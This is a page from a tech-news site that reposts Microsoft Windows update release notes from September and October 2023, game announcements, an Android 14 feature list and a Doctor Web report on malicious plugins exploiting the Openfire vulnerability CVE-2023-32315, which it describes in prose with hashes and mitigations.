Pages

October 10, 2023—KB5031361 (OS Build 17763.4974)

By SeedTheNet, in Updates, October 9, 2023

October 10, 2023—KB5031361 (OS Build 17763.4974)
Win 10 Ent LTSC 2019 Win 10 IoT Ent LTSC 2019 Windows 10 IoT Core 2019 LTSC Windows Server 2019 Less Release Date:
10/10/2023
Version:
OS Build 17763.4974
11/17/20
For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page.
Highlights
This update supports daylight saving time (DST) changes in Greenland.
This update addresses security issues for your Windows operating system.
Improvements
This security update includes improvements. When you install this KB:
New! This update completes the work to comply with the GB18030-2022 requirements. It removes and remaps characters for Microsoft Wubi input and Microsoft Pinyin U-mode input. You can no longer enter character codepoints that are not supported. All the required codepoints are up to date.
New! This update adds Azure Arc Optional Component related links to Server Manager. Now, you can turn on Arc on your servers. You do not need to run a PowerShell script.
This update changes the spelling of Ukraine's capital from Kiev to Kyiv.
This update addresses an issue that affects scheduled tasks. Tasks that call the credential manager API might fail. This occurs if you select [Run only when user is logged on] and [Run with highest privileges].
This update addresses an issue that stops you from getting the IE mode windows list.
This update addresses an issue that affects external binding. It fails. This occurs after you install Windows updates dated May 2023 or later. Because of this, there are issues that affect LDAP queries and authentication.
This update addresses an issue that affects those who enable the “Smart Card is Required for Interactive Logon” account option. When RC4 is disabled, you cannot authenticate to Remote Desktop Services farms. The error message is, "An authentication error has occurred. The requested encryption type is not supported by the KDC.”
This update addresses an issue that affects Kerberos delegation. It might fail in the wrong way. The error code is 0xC000006E (STATUS_ACCOUNT_RESTRICTION). This issue might occur when you mark the intermediate service account as “This account is sensitive and cannot be delegated” in Active Directory. Applications might also return the error message, “System.Security.Authentication.AuthenticationException: Failed to initialize security context. Error code was -2146893042.”
This update affects Windows Filtering Platform (WFP) connections. The redirect diagnostics for them has improved.
This update addresses an issue that affects a relying party. When you sign out of it, a SAML request cookie is not cleared. Because of this, your device automatically attempts to connect to the same relying party when you sign in again.
This update addresses an issue that affects the Server Message Block (SMB) client. It does not reconnect all the persistent handles when the reauthentication of a session fails.
To protect against CVE-2023-44487, you should install the latest Windows update. Based on your use case, you can also set the limit of the RST_STREAMS per minute using the new registry key in this update.
Registry key
Default value
Valid value range
Registry key function
Http2MaxClientResetsPerMinute
500
0–65535
Sets the allowed number of resets (RST_STREAMS) per minute for a connection. When you reach this limit, the connection ends.
If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
For more information about security vulnerabilities, please refer to the new Security Update Guide website and the October 2023 Security Updates.
Windows 10 servicing stack update - 17763.4965
This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.
Known issues in this update
Symptom
Workaround
Using the FixedDrivesEncryptionType or SystemDrivesEncryptionType policy settings in the BitLocker configuration service provider (CSP) node in mobile device management (MDM) apps might incorrectly show a 65000 error in the "Require Device Encryption" setting for some devices in your environment. Affected environments are those with the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies set to enabled and selecting either "full encryption" or "used space only". Microsoft Intune is affected by this issue but third-party MDMs might also pe affected.
Important This issue is a reporting issue only and does not affect drive encryption or the reporting of other issues on the device, including other BitLocker issues.

To mitigate this issue in Microsoft Intune, you can set the “Enforce drive encryption type on operating system drives” or "Enforce drive encryption on fixed drives" policies to not configured.
We are working on a resolution and will provide an update in an upcoming release.

How to get this update
Before installing this update
Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.
Prerequisite:
You must install the August 10, 2021 SSU (KB5005112) before installing the LCU.

Install this update
Release Channel
Available
Next Step
Windows Update and Microsoft Update
Yes
None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business
Yes
None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog
Yes
To get the standalone package for this update, go to the Microsoft Update Catalog website.
Windows Server Update Services (WSUS)
Yes
This update will automatically sync with WSUS if you configure Products and Classifications as follows:
Product: Windows 10
Classification: Security Updates
If you want to remove the LCU
To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
File information
For a list of the files that are provided in this update, download the file information for cumulative update 5031361.
For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.4965.

Read more...
0 comments
259 views

October 10, 2023—KB5031362 (OS Build 14393.6351)

By SeedTheNet, in Updates, October 9, 2023

October 10, 2023—KB5031362 (OS Build 14393.6351)
Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date:
10/10/2023
Version:
OS Build 14393.6351
11/19/20
For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1607, see its update history page.
Highlights
This update supports daylight saving time (DST) changes in Greenland.
This update addresses security issues for your Windows operating system.
Improvements
This security update includes quality improvements. When you install this KB:
New! IE mode and Microsoft Edge can now share cookies. To learn more, see Cookie sharing between Microsoft Edge and Internet Explorer.
New! This update completes the work to comply with the GB18030-2022 requirements. It removes and remaps characters for Microsoft Wubi input and Microsoft Pinyin U-mode input. You can no longer enter character codepoints that are not supported. All the required codepoints are up to date.
This update changes the spelling of Ukraine's capital from Kiev to Kyiv.
This update addresses an issue that affects external binding. It fails. This occurs after you install Windows updates dated May 2023 or later. Because of this, there are issues that affect LDAP queries and authentication.
To protect against CVE-2023-44487, you should install the latest Windows update. Based on your use case, you can also set the limit of the RST_STREAMS per minute using the new registry key in this update.
Registry key
Default value
Valid value range
Registry key function
Http2MaxClientResetsPerMinute
500
0–65535
Sets the allowed number of resets (RST_STREAMS) per minute for a connection. When you reach this limit, the connection ends.
If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
For more information about security vulnerabilities, please refer to the new Security Update Guide website and the October 2023 Security Updates.
Known issues in this update
Microsoft is not currently aware of any issues with this update.
How to get this update
Before installing this update
Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.
If you are using Windows Update, the latest SSU (KB5031467) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog.
Install this update
Release Channel
Available
Next Step
Windows Update and Microsoft Update
Yes
None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business
Yes
None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog
Yes
To get the standalone package for this update, go to the Microsoft Update Catalog website.
Windows Server Update Services (WSUS)
Yes
This update will automatically sync with WSUS if you configure Products and Classifications as follows:
Product: Windows 10
Classification: Security Updates

File information
For a list of the files that are provided in this update, download the file information for cumulative update 5031362.

Read more...
0 comments
186 views

Commandos: Origins is announced

By SeedTheNet, in Gaming, October 4, 2023

ALARM! You have been selected for a mission which will shape the fate of the entire world. Witness the very beginning of the legendary elite WWII force in Commandos: Origins. The long-awaited sequel to the Commandos series brings you right back to the foundation of the real-time tactics genre. And to the days where Jack O’Hara, the Green Beret, and his five companions met to form the infamous unit sent to complete missions which no others would dare to accept.

In the hushed shadows of history’s most pivotal moments, where heroes are born and legends are forged, a new chapter awaits. Whether it is a daring raid, a covert sabotage, or a courageous rescue mission – the Green Beret, the Sapper, the Sniper, the Driver, the Marine and the Spy will need to combine their skills to meet the most challenging tasks. Your mission can only be achieved through well-thought planning and the smart combination of stealth and destruction that come with the unique skillsets of this elite troop.

From the icy plains of the Arctic to the vast deserts of Africa, from the western coastlines of Europe to the Eastern front, it’s up to you to lead your commandos to success in high-risk missions. Guide them in their fight against the growing Nazi occupation which is menacing the free world.

Challenging Real Time Tactical Stealth Gameplay: Make the best use of your Commandos’ unique abilities, infiltrate enemy facilities and hit them where it hurts most before disappearing into the shadows.
An extraordinary team: Featuring 6 infamous characters, each with their own storied history, banding together to form an extraordinary fighting force – the Commandos: Take control over Jack O’Hara “the Green Beret”, Thomas “the Sapper” Hancock, Francis T. “the Sniper” Woolridge, Samuel “the Driver” Brooklyn, James “the Marine” Blackwood, and Rene “the Spy” Duchamp and lead them to success.
Many paths to victory: The detailed, varied and interactive environments offer multiple approaches to reach your goal. Sneak, climb, drive in various vehicles, or hide and creep your way to mission success!
On your mark: A modern user experience with precise and intuitive controls enables you to control the commandos with expert precision. Coordinate complex actions simultaneously to overcome heavily fortified targets.
Fight on all fronts: Play through more than 10 missions in historically authentic WWII environments, spanning from the barren Arctic to the African desert, with a range of core and voluntary objectives that will require your full tactical expertise.
There is no I in team: Take on missions with a friend in the 2-player cooperative multiplayer mode, either online or via local split-screen.

If you are coming from the old classics of Commandos or Desperados or the recent games by Mimimi Games then you will be happy for this announcement
Store Page : https://store.steampowered.com/app/1479730/Commandos_Origins/

commandos

Read more...
0 comments
162 views

Android 14 is rumored to be releasing tomorrow with Google Pixel 8

By SeedTheNet, in General, October 3, 2023

Android 14 is an upcoming major release of the Android mobile operating system. It is expected to be released on October 4, 2023 at the Made by Google event along with the Google Pixel 8 and Pixel 8 Pro. As of October 3, 2023, Google has yet to make an official announcement about the Android 14 release date.
Android 14 features and changes list
The following table lists all documented features and behavior changes that might affect app developers. Use this list to find changes that affect you, and then use the corresponding link to read the documentation.
Category Type Name Accessibility Change (all apps) Test your app with non-linear font scaling
Because Android supports font scaling up to 200%, you should perform UI testing to ensure that your app can accommodate larger font sizes without impacting usability. Accessibility New features and APIs Non-linear font scaling to 200%
Android supports font scaling up to 200%, providing low-vision users with additional accessibility options that align with Web Content Accessibility Guidelines (WCAG). Camera and media New features and APIs Ultra HDR for images
Android 14 adds support for 10-bit High Dynamic Range (HDR) images that retain more of the information from the sensor when taking a photo, which enables vibrant colors and greater contrast. Camera and media New features and APIs Zoom, Focus, Postview, and more in camera extensions
Android 14 upgrades and improves camera extensions, allowing apps to handle longer processing times, which enables improved images using compute-intensive algorithms like low-light photography on supported devices. Camera and media New features and APIs In-sensor zoom
Implement request override controls to give users zoom control even before other camera controls are ready. Camera and media New features and APIs Lossless USB audio
Android 14 gains support for lossless audio formats for audiophile-level experiences over USB wired headsets. Core functionality Change (all apps) Apps can kill only their own background processes
When your app calls killBackgroundProcesses(), the API can kill only the background processes of your own app. Core functionality Change (all apps) Schedule exact alarms are denied by default
The SCHEDULE_EXACT_ALARM permission is no longer being pre-granted to most newly-installed apps targeting Android 13 and higher—the permission is denied by default. Core functionality Change (all apps) Context-registered broadcasts are queued while apps are cached
The system may place context-registered broadcasts in a queue when these broadcasts are queued for delivery to an app that's in the cached state. Core functionality Change (all apps) MTU is set to 517 for the first GATT client requesting an MTU
The Android Bluetooth stack more strictly adheres to Version 5.2 of the Bluetooth Core Specification and requests the BLE ATT MTU to 517 bytes when the first GATT client requests an MTU using the BluetoothGatt#requestMtu(int) API, and disregards all subsequent MTU requests on that ACL connection. Core functionality Change (all apps) New reason an app can be placed in the restricted standby bucket
Android 14 introduces a new reason an app can be placed into the restricted standby bucket. Core functionality Change (all apps) System enforces cached-app resource usage
Shortly after an app process enters a cached state, background work is disallowed, until a process component re-enters an active state of the lifecycle. Core functionality Change (all apps) mlock limited to 64 KB
In Android 14 and higher, the platform reduces the maximum memory that can be locked using mlock() to 64 KB per process. Core functionality Change (apps targeting 14+) Foreground service types are required
If your app targets Android 14 or higher, it must specify at least one foreground service type for each foreground service within your app. Core functionality Change (apps targeting 14+) Enforcement of BLUETOOTH_CONNECT permission in BluetoothAdapter
Android 14 enforces the BLUETOOTH_CONNECT permission when calling the BluetoothAdapter getProfileConnectionState() method for apps targeting Android 14 (API level 34) or higher. Core functionality Change (apps targeting 14+) OpenJDK 17 updates
As part of the OpenJDK 17 updates, there are some changes that can affect app compatibility, such as changes to regular expressions and UUID handling. Core functionality Change (apps targeting 14+) JobScheduler reinforces callback and network behavior
If your app targets Android 14 or higher and exceeds the granted time on the main thread, the app triggers an ANR with the error message. Developer productivity and tools New features and APIs Credential Manager
Android 14 introduces Credential Manager, which supports multiple sign-in methods, including username and password, passkeys, and federated sign-in solutions (such as Sign-in with Google) in a single API. Developer productivity and tools New features and APIs Health Connect
Starting with Android 14, Health Connect is part of the platform and receives updates through Google Play system updates without requiring a separate download. Developer productivity and tools New features and APIs Sharesheet custom actions and improved ranking
Android 14 updates the system sharesheet to support custom app actions and more informative preview results for users. Developer productivity and tools New features and APIs Support for built-in and custom animations
Apps that use the new system back APIs can opt in to predictive back to automatically receive in-app animations and also support custom transitions. Developer productivity and tools New features and APIs OpenJDK 17 updates
Android 14 includes features and improvements that further align with the OpenJDK 17 LTS release, including both library updates and Java 17 language support for app and platform developers. Developer productivity and tools New features and APIs Improvements for app stores
Android 14 introduces several new PackageInstaller APIs that allow app stores to improve their user experience. Developer productivity and tools New features and APIs App metadata bundles
Starting in Android 14, the Android package installer lets you specify app metadata, such as data safety practices, to include on app store pages such as Google Play. Developer productivity and tools New features and APIs Screenshot detection
A privacy-preserving API that invokes a callback and displays a toast message when the user takes a screenshot while an app activity is visible. Internationalization New features and APIs Per-app language preferences
Android 14 expands on the per-app language features that were introduced in Android 13 (API level 33) with some additional capabilities. Graphics New features and APIs Paths are now queryable and interpolatable
Query paths to find out what's inside of them, interpolate between paths whose structures match exactly, and enable morphing effects. Graphics New features and APIs Custom meshes with vertex and fragment shaders
Android 14 adds support for custom meshes, which can be defined as triangles or triangle strips, and can, optionally, be indexed. Graphics New features and APIs Hardware buffer renderer for Canvas
To assist in using Android's Canvas API to draw with hardware acceleration into a HardwareBuffer, Android 14 introduces HardwareBufferRenderer. Internationalization New features and APIs Grammatical Inflection API
The Grammatical Infection API lets you more easily add support for users who speak languages that have grammatical gender, providing a more personalized and natural-sounding user experience for those languages. Internationalization New features and APIs Regional preferences
Apps can receive notifications when a user changes their regional preferences and mirror these preferences in app. Non-SDK interface restrictions Change (apps targeting 14+) Updates to non-SDK interface restrictions
Android 14 includes updated lists of restricted non-SDK interfaces based on collaboration with Android developers and the latest internal testing. Security Change (all apps) Minimum installable target API level
Apps with a targetSdkVersion lower than 23 can't be installed. Security Change (all apps) Media owner package names might be redacted
The value of OWNER_PACKAGE_NAME is redacted unless apps meet certain conditions. Security Change (apps targeting 14+) Restrictions to implicit and pending intents
For apps targeting Android 14, Android restricts apps from sending implicit intents to internal app components. Security Change (apps targeting 14+) Runtime-registered broadcasts receivers must specify export behavior
Apps and services that target Android 14 and use context-registered receivers are required to specify a flag to indicate whether or not the receiver should be exported to all other apps on the device. Security Change (apps targeting 14+) Safer dynamic code loading
If your app targets Android 14 and uses Dynamic Code Loading (DCL), all dynamically-loaded files must be marked as read-only. Security Change (apps targeting 14+) Zip path traversal
For apps targeting Android 14, Android prevents the Zip Path Traversal Vulnerability by restricting what zip file entry names can contain. Security Change (apps targeting 14+) Additional restrictions on starting activities from the background
Apps that target Android 14 must opt in if they want to grant their background activity launch privileges to another app either when sending that app's PendingIntent, or binding that app's service. User experience Change (all apps) Grant partial access to photos and videos
The user can grant partial access to their photos and videos when an app requests any visual media permissions that were introduced in Android 13 (API level 33): READ_MEDIA_IMAGES and READ_MEDIA_VIDEO. User experience Change (all apps) Secure full-screen Intent notifications
With Android 14, only apps that provide calling and alarms are allowed to use the USE_FULL_SCREEN_INTENT permission to support full-screen intent notifications. User experience Change (all apps) Changes to how users experience non-dismissable notifications
If your app shows non-dismissable foreground notifications to users, Android 14 has changed the behavior to allow users to dismiss such notifications. User experience Change (all apps) Data safety information is more visible
Your app's data safety information, such as data-sharing practices, now appears in some permission rationale system dialogs and in system notifications. Java and OpenJDK are trademarks or registered trademarks of Oracle and/or its affiliates.

android 14

Read more...
0 comments
204 views

Counter Strike 2 is out , replaces CS:GO in Steam!

By SeedTheNet, in Gaming, September 26, 2023

The next era of Counter-Strike is here! Counter-Strike 2 is the largest technical leap forward in Counter-Strike’s history, ensuring new features and updates for years to come.

Counter-Strike 2 is a free upgrade to CS:GO. So build your loadout, hone your skills, and prepare yourself for what’s next!

Read on to learn more about some of the features of Counter-Strike 2. https://www.counter-strike.net/cs2 https://store.steampowered.com/app/730/CounterStrike_2/

Read more...
0 comments
190 views

Vulnerability in Openfire messaging software allows unauthorized access to compromised servers - DrWeb report

By SeedTheNet, in Security, September 26, 2023

Vulnerability in Openfire messaging software allows unauthorized access to compromised servers
September 25, 2023
Doctor Web is notifying users about the spread of malicious plugins for the Openfire messaging server. To date, more than 3,000 servers worldwide that have Openfire software installed on them have been affected by a vulnerability that lets hackers gain access to the file system and use the infected servers as part of a botnet.
In June 2023, Doctor Web was contacted by a customer reporting an incident where attackers had been able to encrypt files on their server. The investigation revealed that the infection was implemented as part of the post-exploitation of the CVE-2023-32315 vulnerability in Openfire messaging software. This exploit performs a directory traversal attack and allows unauthorized access to the administrative interface of the Openfire software, which is used by attackers to create a new user with administrative privileges. The attackers then log in using the newly created account and install the malicious plugin helloworld-openfire-plugin-assembly.jar (SHA1:41d224784242151825aa8001a35ee339a0fef2813f), which can run arbitrary code. The plugin allows shell commands to be executed on a server that has Openfire software installed on it, as well as code, written in Java, to be launched and then transmitted to the plugin in a POST request. This is exactly how the encryption trojan was launched on our customer's server.
To obtain a sample of this crypto malware, we created an Openfire honeypot and monitored the attacks against it for several weeks. During the time our server was running, we were able to obtain samples of three different malicious plugins. We also obtained samples of two trojans that were installed on our server after Openfire was compromised.
The first trojan is a mining trojan, written in Go, that is known as kinsing (Linux.BtcMine.546). An attack using this trojan is carried out in four stages:
exploitation of the CVE-2023-32315 vulnerability to create an administrative account named "OpenfireSupport". authentication under the created user. installation of the malicious plugin.jar (SHA1:0c6249feee3fef50fc0a5a06299c3e81681cc838) on the server. the download and launch of the trojan with the help of the installed malicious plugin. In another attack scenario, the system was infected with the Linux.BackDoor.Tsunami.1395 trojan, written in C and packed with UPX. The infection process is very similar to the previous one, except that an administrative user was created with a random name and password.
The third scenario is the most interesting because instead of installing a trojan in the system, the attackers used a malicious Openfire plugin to obtain information about the compromised server. In particular, they were interested in information about the network connections, the IP address, users, and the system’s kernel version.
The malicious plugins installed in all these cases are JSP.BackDoor.8 backdoors written in Java. These plugins can run a variety of commands in the form of GET and POST requests sent by attackers.
The vulnerability in the Openfire messaging server in question has been fixed in the updates to versions 4.6.8 and 4.7.5. Doctor Web specialists recommend upgrading to the latest versions. If this is not possible, efforts should be made to minimize the attack surface: restrict network access to ports 9090 and 9091, modify the Openfire settings file, redirect the administrator console address to the loopback interface or use the AuthFilterSanitizer plugin.
Dr.Web antivirus successfully detects and neutralizes modifications of the JSP.BackDoor.8 backdoor, as well as the Linux.BtcMine and Linux.BackDoor.Tsunami trojans, so they do not pose a threat to our users.
Source : https://news.drweb.com/show/?i=14756&lng=enu

Read more...
3 comments
286 views

September 12, 2023—KB5030216 (OS Build 20348.1970)

By SeedTheNet, in Updates, September 14, 2023

September 12, 2023—KB5030216 (OS Build 20348.1970)
Windows Server 2022 Release Date:
9/12/2023
Version:
OS Build 20348.1970
For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows Server 2022, see its update history page.
Note Follow @WindowsUpdate to find out when new content is published to the Windows release health dashboard.
Improvements
This security update includes quality improvements. When you install this KB:
New! This update affects firewall settings. You can now make changes that allow you to configure application group rules.
This update supports daylight saving time (DST) changes in Israel.
This update addresses an issue that affects Server Message Block (SMB). You cannot access the SMB shared folder. The errors are, “Not enough memory resources” or “Insufficient system resources.”
The update addresses an issue that affects scheduled tasks. The tasks fail when they use stored local user account credentials. This occurs when you enable Credential Guard. The error message is "2147943726: ERROR_LOGON_FAILURE (The user name or password is incorrect).”
This update addresses an issue that affects the Local Security Authority Subsystem Service (LSASS). It stops responding. This occurs when you use Azure Virtual Desktop (AVD).
The update addresses an issue that affects those who use Windows Update for Business. After you are asked to change your password at sign in, the change operation fails. Then you cannot sign in. The error code is 0xc000006d.
This update addresses an issue that affects the Local Security Authority Subsystem Service (LSASS) process. It might stop responding. Because of this, the machine restarts. The error is 0xc0000005 (STATUS_ACCESS_VIOLATION).
This update addresses an issue that affects the Tab Window Manager. It stops responding when you use IE mode.
This update addresses an issue that is related to changes in the forwarding of events.
This update addresses an issue that affects the Group Policy Service. It will not wait for 30 seconds, which is the default wait time, for the network to be available. Because of this, policies are not correctly processed.
This update adds a new API for D3D12 Independent Devices. You can use it to create multiple D3D12 devices on the same adapter. To learn more, see D3D12 Independent Devices.
This update addresses an issue that affects virtual machines (VM). Creating new VMs fails for Azure Stack Hub customers. This occurs when you add a new node to a cluster.
This update addresses an issue that affects certain VMs. Deploying them fails. This occurs because certain VM images do not respond to Address Resolution Protocol (ARP) requests if the source is outside of the local network.
This update addresses an issue that affects Azure Stack HCI customers. Your attempts to create VMs fail. This occurs when you delete and recreate server Representational State Transfer (REST) resources for the Network Controller.
This update addresses an issue that affects print jobs that are sent to a virtual print queue. They fail without an error.
This update affects Windows Defender Application Control (WDAC). Its policy to block software based on a hash might not stop the software from running.
This update affects unsigned WDAC policies. They are copied to the Extensible Firmware Interface (EFI) disk partition. It is reserved for signed policies.
This update addresses an issue that affects the Remote Desktop (RD) Web Role. If you enable that role, it fails when you upgrade RD deployments more than once.
This update addresses an issue that affects Narrator. Its focus does not change when the keyboard focus changes. Because of this, Narrator reads the wrong label within the dialog that appears when you sign in.
This update addresses an issue that affects the Microsoft Distributed Transaction Coordinator (DTC). It has a handle leak. Because of this, the system runs out of memory.
This update addresses an issue that affects the Resultant Set of Policy (RSOP). The Windows LAPS "BackupDirectory" policy setting was not being reported. This occurs when the setting is set to 1, which is “Back up to AAD.”
This update addresses an issue that affects authentication. Using a smart card to join or rejoin a computer to an Active Directory domain might fail. This occurs after you install Windows updates dated October 2022 or later. For more details, see KB5020276.
This update addresses an issue that affects DPM 2019 and DPM 2022. When you try to install them, it fails. This occurs because the Resilient File System (ReFS) stops responding.
If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
For more information about security vulnerabilities, please refer to the Security Update Guide and the September 2023 Security Updates.
Windows Server 2022 servicing stack update - 20348.1960
This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.
Known issues in this update
Symptom
Workaround
After installing this update on guest virtual machines (VMs) running Windows Server 2022 on some versions of VMware ESXi, Windows Server 2022 might not start up. Only Windows Server 2022 VMs with Secure Boot enabled are affected by this issue. Affected versions of VMware ESXi are versions vSphere ESXi 7.0.x and below.

Please see VMware’s documentation to mitigate this issue.
Microsoft and VMware are investigating this issue and will provide more information when it is available.

How to get this update
Before installing this update
Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.

Install this update
Release Channel
Available
Next Step
Windows Update and Microsoft Update
Yes
None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business
Yes
None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog
Yes
To get the standalone package for this update, go to the Microsoft Update Catalog website.
Windows Server Update Services (WSUS)
Yes
This update will automatically sync with WSUS if you configure Products and Classifications as follows:
Product: Microsoft Server operating system-21H2
Classification: Security Updates

If you want to remove the LCU
To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
File Information
For a list of the files that are provided in this update, download the file information for cumulative update 5030216.
For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 20348.1960.

Read more...
0 comments
277 views

September 12, 2023—KB5030214 (OS Build 17763.4851)

By SeedTheNet, in Updates, September 14, 2023

September 12, 2023—KB5030214 (OS Build 17763.4851)
Win 10 Ent LTSC v2019 Win 10 IoT Ent LTSC v2019 Windows 10 IoT Core 2019 LTSC Windows Server 2019 Less Release Date:
9/12/2023
Version:
OS Build 17763.4851
11/17/20
For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1809, see its update history page.
Highlights
This update addresses security issues for your Windows operating system.
Improvements
This security update includes improvements. When you install this KB:
This update supports daylight saving time (DST) changes in Israel.
This update addresses an issue that affects the Microsoft Distributed Transaction Coordinator (DTC). It has a handle leak. Because of this, the system runs out of memory.
This update addresses an issue that affects the Resultant Set of Policy (RSOP). The Windows LAPS "BackupDirectory" policy setting was not being reported. This occurs when the setting is set to 1, which is “Back up to AAD.”
This update addresses an issue that affects Server Message Block (SMB). You cannot access the SMB shared folder. The errors are, “Not enough memory resources” or “Insufficient system resources.”
The update addresses an issue that affects scheduled tasks. The tasks fail when they use stored local user account credentials. This occurs when you enable Credential Guard. The error message is "2147943726: ERROR_LOGON_FAILURE (The user name or password is incorrect).”
The update addresses an issue that affects those who use Windows Update for Business. After you are asked to change your password at sign in, the change operation fails. Then you cannot sign in. The error code is 0xc000006d.
This update addresses an issue that is related to changes in the forwarding of events.
This update addresses an issue that affects the Group Policy Service. It will not wait for 30 seconds, which is the default wait time, for the network to be available. Because of this, policies are not correctly processed.
This update addresses an issue that affects the Remote Desktop (RD) Web Role. If you enable that role, it fails when you upgrade RD deployments more than once.
This update addresses an issue that affects Narrator. Its focus does not change when the keyboard focus changes. Because of this, Narrator reads the wrong label within the dialog that appears when you sign in.
This update addresses an issue that affects authentication. Using a smart card to join or rejoin a computer to an Active Directory domain might fail. This occurs after you install Windows updates dated dated October 2022 or later. For more details, see KB5020276.

If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
For more information about security vulnerabilities, please refer to the new Security Update Guide website and the September 2023 Security Updates.
Windows 10 servicing stack update - 17763.4840
This update makes quality improvements to the servicing stack, which is the component that installs Windows updates. Servicing stack updates (SSU) ensure that you have a robust and reliable servicing stack so that your devices can receive and install Microsoft updates.
Known issues in this update
Microsoft is not currently aware of any issues with this update.
How to get this update
Before installing this update
Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.
Prerequisite:
You must install the August 10, 2021 SSU (KB5005112) before installing the LCU.

Install this update
Release Channel
Available
Next Step
Windows Update and Microsoft Update
Yes
None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business
Yes
None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog
Yes
To get the standalone package for this update, go to the Microsoft Update Catalog website.
Windows Server Update Services (WSUS)
Yes
This update will automatically sync with WSUS if you configure Products and Classifications as follows:
Product: Windows 10
Classification: Security Updates
If you want to remove the LCU
To remove the LCU after installing the combined SSU and LCU package, use the DISM/Remove-Package command line option with the LCU package name as the argument. You can find the package name by using this command: DISM /online /get-packages.
Running Windows Update Standalone Installer (wusa.exe) with the /uninstall switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.
File information
For a list of the files that are provided in this update, download the file information for cumulative update 5030214.
For a list of the files that are provided in the servicing stack update, download the file information for the SSU - version 17763.4840.

Read more...
0 comments
313 views

September 12, 2023—KB5030213 (OS Build 14393.6252)

By SeedTheNet, in Updates, September 14, 2023

September 12, 2023—KB5030213 (OS Build 14393.6252)
Windows 10, version 1607, all editions Windows Server 2016, all editions Release Date:
9/12/2023
Version:
OS Build 14393.6252
11/19/20
For information about Windows update terminology, see the article about the types of Windows updates and the monthly quality update types. For an overview of Windows 10, version 1607, see its update history page.
Highlights
This update addresses security issues for your Windows operating system.
Improvements
This security update includes quality improvements. When you install this KB:
This update supports daylight saving time (DST) changes in Israel.
This update addresses an issue that affects remote procedure calls (RPC) to the Win32_User or Win32_Group WMI class. The domain member that runs the RPC contacts the primary domain controller (PDC). When multiple RPCs occur at the same time on many domain members, this might overwhelm the PDC.
This update addresses an issue that affects the LanmanServer Service. It stops working in clusters that do not have an Administrative Access Point. These are also known as AD-Detached Clusters. They are recommended for Microsoft Exchange on some versions of Windows. To learn more, see Database availability groups.
This update addresses an issue that affects authentication. Using a smart card to join or rejoin a computer to an Active Directory domain might fail. This occurs after you install Windows updates dated October 2022 or later. For more details, see KB5020276.

If you installed earlier updates, only the new updates contained in this package will be downloaded and installed on your device.
For more information about security vulnerabilities, please refer to the new Security Update Guide website and the September 2023 Security Updates.
Known issues in this update
Microsoft is not currently aware of any issues with this update.
How to get this update
Before installing this update
Microsoft strongly recommends you install the latest servicing stack update (SSU) for your operating system before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU and applying Microsoft security updates. For general information about SSUs, see Servicing stack updates and Servicing Stack Updates (SSU): Frequently Asked Questions.
If you are using Windows Update, the latest SSU (KB5030504) will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the Microsoft Update Catalog.
Install this update
Release Channel
Available
Next Step
Windows Update and Microsoft Update
Yes
None. This update will be downloaded and installed automatically from Windows Update.
Windows Update for Business
Yes
None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies.
Microsoft Update Catalog
Yes
To get the standalone package for this update, go to the Microsoft Update Catalog website.
Windows Server Update Services (WSUS)
Yes
This update will automatically sync with WSUS if you configure Products and Classifications as follows:
Product: Windows 10
Classification: Security Updates

File information
For a list of the files that are provided in this update, download the file information for cumulative update 5030213.

Read more...
